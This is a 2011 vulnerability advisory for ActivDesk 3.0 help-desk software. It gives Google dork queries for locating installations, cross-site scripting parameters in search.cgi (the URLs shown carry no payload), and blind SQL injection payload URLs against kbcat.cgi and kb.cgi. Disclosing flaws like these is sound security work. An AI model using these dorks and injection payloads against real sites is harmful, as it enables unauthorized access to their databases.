ActivDesk 3.0 multiple security vulnerabilities # Date: 2011-06-24 # Author: Brendan Coles # Advisory: http://itsecuritysolutions.org/2011-06-24-ActivDesk-3.0-multiple-security-vulnerabilities/ # Software: ActivDesk # Version: <= 3.0 # Homepage: http://www.webhelpdesk-software.com/ # Google Dorks: # inurl:kbcat.cgi ext:cgi # "Help Desk Powered By ActivDesk" # Vendor: FocalMedia # Homepage: http://www.focalmedia.net/ # Notified: 2011-06-24 - Ticket# 67120010491 # Cross-Site Scripting (XSS): http://localhost/[PATH]/search.cgi?keywords0= http://localhost/[PATH]/search.cgi?keywords1= http://localhost/[PATH]/search.cgi?keywords2= http://localhost/[PATH]/search.cgi?keywords3= # Blind SQL Injection: http://localhost/[PATH]/kbcat.cgi?cid=' or substring(@@version,1,1)=5 and ''=' http://localhost/[PATH]/kb.cgi?kid=' or substring(@@version,1,1)=5 and ''='